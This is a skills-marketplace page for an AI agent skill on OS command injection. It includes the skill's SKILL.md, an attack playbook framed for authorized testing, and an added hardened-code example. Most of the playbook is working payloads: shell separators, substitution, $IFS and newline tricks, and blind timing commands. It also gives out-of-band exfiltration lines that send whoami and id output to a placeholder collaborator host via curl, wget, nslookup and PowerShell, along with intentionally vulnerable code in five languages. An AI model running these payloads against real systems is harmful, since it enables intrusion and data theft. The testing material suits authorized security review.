
Cmdi Command Injection
Run a structured command-injection test playbook when user input might reach shells, converters, or blind out-of-band sinks in your own app or staging environment.
Overview
cmdi-command-injection is an agent skill most often used in Ship (also Build integrations, Operate iterate) that walks through shell metacharacter, blind, and out-of-band command-injection test patterns when user input m
Install
npx skills add https://github.com/yaklang/hack-skills --skill cmdi-command-injection
What is this skill?
- Shell metacharacter reference table with separator, pipe, and substitution behaviors
- First-pass payload families for generic separators, quoted args, blind timing, and OOB DNS
- Blind injection coverage including time-based detection and out-of-band exfiltration paths
- Polyglot and encoding tricks such as IFS, brace expansion, and newline-separated commands
- Routes to upload-insecure-files when the sink sits inside import or conversion workflows
- First-pass table covers five injection contexts including generic separator, quoted argument, blind timing, substitution
- Dedicated shell metacharacter reference section for injection operators
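The metacharacter reference and payload families the skill ships are the tester's view of a shell sink. As an added example that is not part of the skill or this page, here is the `ping <host>` sink those payloads target beside its hardened form: the host is validated against an allowlist and passed as one argv element with no shell, with `shlex.quote` kept only as defence in depth. Function names and the sample inputs are mine.

```python
# Added example, not the skill's or the page's own code (names and inputs are mine):
# the "ping <host>" shell sink the playbook targets, beside its hardened form.
import re
import shlex
import subprocess

# Constructed inputs: two benign hosts plus decoded forms of the playbook's
# separator, substitution, newline (%0a) and $IFS payloads.
SAMPLE_INPUTS = [
    "127.0.0.1", "example.com",
    "x.com; id", "127.0.0.1 && cat /etc/passwd",
    "$(id)", "`id`", "x.com\nid", "cat$IFS/etc/passwd",
]
# Allowlist for a hostname or IPv4 literal: dot-separated labels of [A-Za-z0-9-].
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"
_HOST_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")

def vulnerable_command(host: str) -> str:
    """The sink as the vulnerable app writes it: input pasted into a shell string."""
    return "ping -c 1 " + host  # handed to os.system / shell=True in the vulnerable app

def shell_tokens(command: str) -> list[str]:
    """Tokenize as a shell would: ; | & ( ) < > come out as separate operator tokens."""
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))

def is_valid_host(host: str) -> bool:
    """Allowlist check: a plain hostname/IPv4 only (run it after URL decoding)."""
    return len(host) <= 253 and _HOST_RE.fullmatch(host) is not None

def hardened_argv(host: str) -> list[str]:
    """Hardened form: the validated value is one argv element; no shell is involved."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", host]

def run_hardened(host: str) -> int:
    """shell=False with an argv list never starts /bin/sh, so metacharacters are inert."""
    return subprocess.run(hardened_argv(host), check=False).returncode

def quoted_command(host: str) -> str:
    """Defence in depth when a shell string is unavoidable: quote, never concatenate."""
    return "ping -c 1 " + shlex.quote(host)

def rejected_inputs(inputs: list[str]) -> list[str]:
    """Which of the inputs the allowlist turns away."""
    return [v for v in inputs if not is_valid_host(v)]
```

`shell_tokens` shows the difference the shell sees: in the concatenated string `;` becomes its own operator token, while the quoted or argv form keeps the whole value inside one word.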
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).
What problem does it solve?
You suspect shell execution in your stack but only test obvious separators and miss blind timing, substitution, and import-pipeline sinks.
Who is it for?
Solo builders and small teams auditing their own APIs, CLIs, or import pipelines in staging with agent-assisted security review.
Skip if: Teams without authorization to test a system, or builders who need compliance automation instead of manual offensive test patterns.
When should I use this skill?
User input may reach shell commands, process execution, converters, import pipelines, or blind out-of-band command sinks.
What do I get? / Deliverables
You get a repeatable injection playbook with context-specific starter payloads and routing to related upload workflows so you can document and fix sinks before release.
- Context-mapped injection payload families and metacharacter test notes
- Blind and OOB detection steps tied to the suspected sink
Recommended Skills
Journey fit
Spans multiple journey phases - primary shelf plus alternate fits below.
Canonical shelf on Ship because exploitation playbooks belong with pre-release security hardening and penetration-style verification, not greenfield feature work. Security subphase groups offensive test patterns with other app-hardening and review skills solo builders use before exposing APIs and admin tools.
Where it fits
Map shell calls inside a PDF or media converter before you wire untrusted uploads to it.
Run separator and substitution payload families against admin endpoints in staging pre-release.
Reproduce a reported injection suspicion in a background job without guessing metacharacters in chat.
How it compares
Use as a focused injection playbook rather than a generic secure-coding linter or passive dependency scanner.
Common Questions / FAQ
Who is cmdi-command-injection for?
It is for indie developers and security-minded builders who ship backends, CLIs, or file-processing features and need structured command-injection test ideas during authorized reviews.
When should I use cmdi-command-injection?
Use it in Ship security review when validating APIs before launch, in Build integrations when wiring shell-backed converters, and in Operate iterate when reproducing suspected injection in staging.
Is cmdi-command-injection safe to install?
Treat it as offensive security guidance—only run tests on systems you own or are permitted to test, and review the Security Audits panel on this Prism page before installing.
SKILL.md - Cmdi Command Injection
# SKILL: OS Command Injection — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert command injection techniques. Covers all shell metacharacters, blind injection, time-based detection, OOB exfiltration, polyglot payloads, and real-world code patterns. Base models miss subtle injection through unexpected input vectors.

## 0. RELATED ROUTING

Before going deep, you can first load:

- [upload insecure files](../upload-insecure-files/SKILL.md) when the shell sink is part of a broader upload, import, or conversion workflow

### First-pass payload families

| Context | Start With | Backup |
|---|---|---|
| generic shell separator | `;id` | `&&id` |
| quoted argument | `";id;"` | `';id;'` |
| blind timing | `;sleep 5` | `& timeout /T 5 /NOBREAK` |
| command substitution | `$(id)` | `` `id` `` |
| out-of-band DNS | `;nslookup token.collab` | Windows `nslookup` variant |

```text
cat$IFS/etc/passwd
{cat,/etc/passwd}
%0aid
```

---

## 1. SHELL METACHARACTERS (INJECTION OPERATORS)

These characters break out of the command context and inject new commands:

| Metacharacter | Behavior | Example |
|---|---|---|
| `;` | Runs second command regardless | `dir; whoami` |
| `\|` | Pipes stdout to second command | `dir \| whoami` |
| `\|\|` | Run second only if first FAILS | `dir \|\| whoami` |
| `&` | Run second in background (or sequenced in Windows) | `dir & whoami` |
| `&&` | Run second only if first SUCCEEDS | `dir && whoami` |
| `$(cmd)` | Command substitution | `echo $(whoami)` |
| `` `cmd` `` | Command substitution (backtick) | `` echo `whoami` `` |
| `>` | Redirect stdout to file | `cmd > /tmp/out` |
| `>>` | Append to file | `cmd >> /tmp/out` |
| `<` | Read file as stdin | `cmd < /etc/passwd` |
| `%0a` | Newline character (URL-encoded) | `cmd%0awhoami` |
| `%0d%0a` | CRLF | Multi-command injection |

---

## 2. COMMON VULNERABLE CODE PATTERNS

### PHP

```php
<?php
$dir = $_GET['dir'];
$out = shell_exec("du -h /var/www/html/" . $dir);
// Inject: dir=../ ; cat /etc/passwd
// Inject: dir=../ $(cat /etc/passwd)

exec("ping -c 1 " . $ip);      // $ip = "127.0.0.1 && cat /etc/passwd"
system("convert " . $file);    // ImageMagick RCE
passthru("nslookup " . $host); // $host = "x.com; id"
```

### Python

```python
import os
import subprocess

os.system("curl " + url)                   # url = "x.com; id"
subprocess.call("ls " + path, shell=True)  # shell=True is the key vulnerability
os.popen("ping " + host)
```

### Node.js

```javascript
const { exec } = require('child_process');
exec('ping ' + req.query.host, ...); // host = "x.com; id"
```

### Perl

```perl
use CGI qw(param);

$dir = param("dir");
$command = "du -h /var/www/html" . $dir;
system($command);
# Inject dir field: | cat /etc/passwd
```

### ASP (Classic)

```vb
szCMD = "type C:\logs\" & Request.Form("FileName")
Set oShell = Server.CreateObject("WScript.Shell")
oShell.Run szCMD
' Inject FileName: foo.txt & whoami > C:\inetpub\wwwroot\out.txt
```

---

## 3. BLIND COMMAND INJECTION — DETECTION

When the response shows no command output:

### Time-Based Detection

```bash
# Linux:
; sleep 5
| sleep 5
$(sleep 5)
`sleep 5`
& sleep 5 &

# Windows:
& timeout /T 5 /NOBREAK
& ping -n 5 127.0.0.1
& waitfor /T 5 signal777
```

Compare the response time with and without the payload; a delay of 5+ seconds confirms execution.

### OOB via DNS

```bash
# Linux:
; nslookup BURP_COLLAB_HOST
; host `whoami`.BURP_COLLAB_HOST
$(nslookup $(whoami).BURP_COLLAB_HOST)

# Windows:
& nslookup BURP_COLLAB_HOST
& nslookup %USERNAME%.BURP_COLLAB_HOST
```

### OOB via HTTP

```bash
# Linux:
; curl http://BURP_COLLAB_HOST/`whoami`
; wget http://BURP_COLLAB_HOST/$(id|base64)

# Windows:
& powershell -c "Invoke-WebRequest http://BURP_COLLAB_HOST/$(whoami)"
```

### OOB via Out-of-Band File

```bash
; id > /var/www/html/RANDOM_FILE.txt
# Then access: http